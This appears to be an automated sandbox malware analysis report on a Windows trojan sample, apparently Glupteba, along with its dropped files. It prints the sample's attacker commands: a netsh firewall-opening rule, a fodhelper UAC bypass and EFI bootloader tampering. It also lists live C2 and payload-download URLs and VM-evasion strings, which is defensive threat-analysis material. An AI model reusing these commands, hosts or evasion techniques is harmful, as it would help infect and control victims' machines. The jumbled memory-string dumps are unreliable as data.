vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe@
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	Binary or memory string: yvmciwavewildwB
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp	Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexensvcxenvdb$
Source: csrss.exe, 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp	Binary or memory string: +x@Y}main.isRunningInsideVMWare
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exe$
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: sharedintapp.exe[system process]vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: CoCreateInstanceConnectServerkernel32.dllGetUserDefaultLCIDoleaut32.dllExecQuerySysAllocStringLenShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevmmemctlvmusbmousevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compression

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Performs DNS TXT record lookups

Show sources

Source: Traffic	DNS traffic detected: queries for: trumops.com
Source: Traffic	DNS traffic detected: queries for: logs.trumops.com
Source: Traffic	DNS traffic detected: queries for: f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com
Source: Traffic	DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe	Process created: unknown unknown
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"

Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 00000008.00000002.547493168.000002364BB02000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000008.00000002.546789573.000002364BA13000.00000004.00000001.sdmp	Binary or memory string: \MsMpeng.exe

Remote Access Functionality:

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 16.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4t4y4r89UZ.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4t4y4r89UZ.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4t4y4r89UZ.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4t4y4r89UZ.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4t4y4r89UZ.exe.5040e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.4t4y4r89UZ.exe.5880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4t4y4r89UZ.exe.5040e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t4y4r89UZ.exe.58f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	Scheduled Task/Job1	Process Injection12	Masquerading331	Credential API Hooking1	Security Software Discovery241	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Registry Run Keys / Startup Folder11	Scheduled Task/Job1	Disable or Modify Tools3	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	DLL Side-Loading1	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion2	Security Account Manager	Process Discovery12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	DLL Side-Loading1	Process Injection12	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol25	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information11	Cached Domain Credentials	System Information Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing211	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4t4y4r89UZ.exe	33%	Virustotal		Browse
4t4y4r89UZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	100%	Avira	TR/Agent.twerk
C:\Windows\windefender.exe	100%	Avira	TR/Crypt.XPACK.eocey
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	100%	Avira	TR/Redcap.gsjan
C:\Windows\rss\csrss.exe	100%	Joe Sandbox ML
B:\EFI\Boot\old.efi (copy)	0%	ReversingLabs
B:\EFI\Microsoft\Boot\fw.efi (copy)	0%	ReversingLabs
C:\EFI\Boot\EfiGuardDxe.efi	0%	ReversingLabs
C:\EFI\Boot\bootx64.efi	0%	ReversingLabs
C:\EFI\Microsoft\Boot\bootmgfw.efi	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	46%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	59%	ReversingLabs	Win64.Trojan.Glupject
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	73%	ReversingLabs	Win64.Trojan.Glupteba
C:\Windows\rss\csrss.exe	39%	ReversingLabs	Win32.Trojan.Ulise
C:\Windows\windefender.exe	29%	Metadefender		Browse
C:\Windows\windefender.exe	79%	ReversingLabs	Win32.Trojan.WinGoRanumBot

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.3.csrss.exe.1694ea00.16.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
14.2.csrss.exe.16c44000.16.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://retoti.comidentifier	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:	0%	URL Reputation	safe
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556	0%	Avira URL Cloud	safe
http://gais.cs.ccu.edu.tw/robot.php)Gulper	0%	Virustotal		Browse
http://gais.cs.ccu.edu.tw/robot.php)Gulper	0%	Avira URL Cloud	safe
https://logs.trumops.com	0%	Avira URL Cloud	safe
http://www.spidersoft.com)Wget/1.9	0%	Avira URL Cloud	safe
https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic	0%	Avira URL Cloud	safe
https://retoti.com	0%	Avira URL Cloud	safe
https://trumops.comif-unmodified-sinceillegal	0%	Avira URL Cloud	safe
http://help.ya	0%	Avira URL Cloud	safe
http://devlog.gregarius.net/docs/ua)Links	0%	URL Reputation	safe
http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe	0%	Avira URL Cloud	safe
https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS	0%	Avira URL Cloud	safe
https://runmodes.com/api/log	100%	Avira URL Cloud	malware
https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com	0%	Avira URL Cloud	safe
http://grub.org)Mozilla/5.0	0%	Avira URL Cloud	safe
http://www.everyfeed.c	0%	Avira URL Cloud	safe
https://server8.trumops.com	0%	Avira URL Cloud	safe
https://trumops.com	0%	Avira URL Cloud	safe
http://www.bingmapsportal.comsv	0%	URL Reputation	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
http://www.googlebot.com/bot.html)Links	0%	URL Reputation	safe
https://trumops.comhttps://retoti.com	0%	Avira URL Cloud	safe
https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3	0%	Avira URL Cloud	safe
https://server8.trumops.com/api/pollf	0%	Avira URL Cloud	safe
https://trumops.com/api/install-failureinvalid	0%	Avira URL Cloud	safe
https://activity.windows.comr	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://server8.trumops.com/api/poll	0%	Avira URL Cloud	safe
http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393	0%	Avira URL Cloud	safe
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://www.bloglines.com)F	0%	Avira URL Cloud	safe
http://misc.yahoo.com.cn/he	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://newscommer.com/app/app.exe	100%	URL Reputation	malware
https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp	0%	Avira URL Cloud	safe
http://crl.g	0%	URL Reputation	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://sitescore.aiValue	0%	Avira URL Cloud	safe
http://www.avantbrowser.com)MOT-V9mm/00.62	0%	Avira URL Cloud	safe
https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae	0%	Avira URL Cloud	safe
https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
runmodes.com	104.21.34.203	true	false	high
gohnot.com	172.67.196.11	true	false	high
server8.trumops.com	104.21.79.9	true	false	high
trumops.com	unknown	unknown	false	high
f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com	unknown	unknown	false	high
logs.trumops.com	unknown	unknown	false	high
e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe	false	Avira URL Cloud: safe	unknown
https://runmodes.com/api/log	true	Avira URL Cloud: malware	unknown
https://server8.trumops.com/api/poll	false	Avira URL Cloud: safe	unknown
https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae	false	Avira URL Cloud: safe	unknown
https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://retoti.comidentifier	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.msn.com/msnb	csrss.exe	false		high
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta	4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:	csrss.exe	false	URL Reputation: safe	unknown
